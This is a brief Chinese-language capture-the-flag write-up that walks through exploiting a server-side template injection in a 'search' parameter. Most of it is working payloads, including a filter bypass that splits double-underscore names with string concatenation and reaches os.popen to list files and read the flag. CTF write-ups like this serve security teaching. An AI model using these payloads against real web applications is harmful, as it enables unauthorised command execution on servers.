ssti-0xgame

题目没有提示传达参数，尝试传参search=1

发现None变成了1

参数确定为search，题目既然是ssti，尝试寻找ssti注入点

?search={{1*2}}

发现ssti注入点，尝试ssti命令执行

{{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}

报错了应该是被过滤了,尝试一步步注入：

?search={{config}}

“.”和”config”未被过滤

?search={{config.__class__}}

报错了,__class__被过滤

?search={{config.class}}

确认class被过滤

{{config.__clas}}

确认”__”被过滤而"_"未被过滤，使用"+"拼接绕过

{{config['_'+'_cla'+'ss_'+'_']}}

成功绕过

{{config['_'+'_cla'+'ss_'+'_']['_'+'_in'+'it_'+'_']}}

{{config['_'+'_cla'+'ss_'+'_']['_'+'_in'+'it_'+'_']['_'+'_glo'+'bals_'+'_']}}

{{config['_'+'_cla'+'ss_'+'_']['_'+'_in'+'it_'+'_']['_'+'_glo'+'bals_'+'_']['os'].popen('ls').read()}}

读取flag，得到flag

{{config['_'+'_cla'+'ss_'+'_']['_'+'_in'+'it_'+'_']['_'+'_glo'+'bals_'+'_']['os'].popen('cat flag').read()}}